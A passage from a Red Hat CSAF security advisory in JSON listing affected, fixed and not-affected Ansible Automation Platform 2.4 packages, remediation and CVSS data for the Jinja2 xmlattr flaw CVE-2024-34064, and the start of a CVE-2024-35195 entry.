"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
],
"known_not_affected": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-34064"
},
{
"category": "external",
"summary": "RHBZ#2279476",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2279476"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-34064",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34064"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-34064",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34064"
},
{
"category": "external",
"summary": "https://github.com/pallets/jinja/security/advisories/GHSA-h75v-3vvj-5mfj",
"url": "https://github.com/pallets/jinja/security/advisories/GHSA-h75v-3vvj-5mfj"
}
],
"release_date": "2024-05-06T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-07-12T01:43:40+00:00",
"details": "Red Hat Ansible Automation Platform",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:4522"
},
{
"category": "workaround",
"details": "Do not accept user input as keys to the xmlattr filter without validation. See the statement above for more information.",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "jinja2: accepts keys containing non-attribute characters"
},
{
"cve": "CVE-2024-35195",
"cwe": {
"id": "CWE-670",
"name": "Always-Incorrect Control Flow Implementation"
},
"discovery_date": "2024-05-21T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch",
